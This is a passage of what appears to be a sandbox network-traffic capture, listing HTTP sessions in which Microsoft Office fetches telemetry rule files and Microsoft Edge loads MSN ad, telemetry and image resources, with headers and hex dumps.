                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        68192.168.2.54985213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                        x-ms-request-id: feb02638-401e-0067-7b8c-3a09c2000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-1777c6cb7549x5qchC1TEBggbg0000000aa000000000mhhb
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        69192.168.2.54985413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                        x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-178bfbc474bv587zhC1NYCny5w00000000d00000000094gu
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        70192.168.2.54985513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                        x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-178bfbc474bbcwv4hC1NYCypys00000000g0000000006c77
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        71192.168.2.54985723.96.180.1894437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1067OUTGET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=02AF36CE75CE647F00F523F374AC6592&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=1652c46db0e14d0bf0a8e7c235a9b313 HTTP/1.1
                                                                                                                                                                                                                                                        Host: arc.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Length: 297
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                                                                                                                                                                                        Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC297INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47
                                                                                                                                                                                                                                                        Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        72192.168.2.54985313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                        x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-178bfbc474bmqmgjhC1NYCy16c00000000t000000000d4ag
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        73192.168.2.54985620.189.173.94437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146580938&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 3804
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC3804OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 32 33 3a 34 39 3a 34 30 2e 39 33 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 36 31 34 39 66 39 2d 63 33 62 34 2d 34 36 32 30 2d 38 37 65 32 2d 31 32 61 65 30 39 32 66 66 31 63 61 22 2c 22 65 70 6f 63 68 22 3a 22 34 30 31 35 31 30 38 37 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-20T23:49:40.934Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"2d6149f9-c3b4-4620-87e2-12ae092ff1ca","epoch":"401510876"},"app":{"locale"
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=5d0e753934ad4137a43f94677cfac56e&HASH=5d0e&LV=202411&V=4&LU=1732146583871; Domain=.microsoft.com; Expires=Thu, 20 Nov 2025 23:49:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: MS0=346309c57f074b90af3078ffc42bb314; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 00:19:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        time-delta-millis: 2933
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        74192.168.2.54986123.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC634OUTGET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL
                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 13:08:58 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 1658
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: 5207dc63-23db-47af-bb98-7b1841fb9ec3
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 1658
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=264094
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 01:11:17 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC1658INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        75192.168.2.54986223.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC633OUTGET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
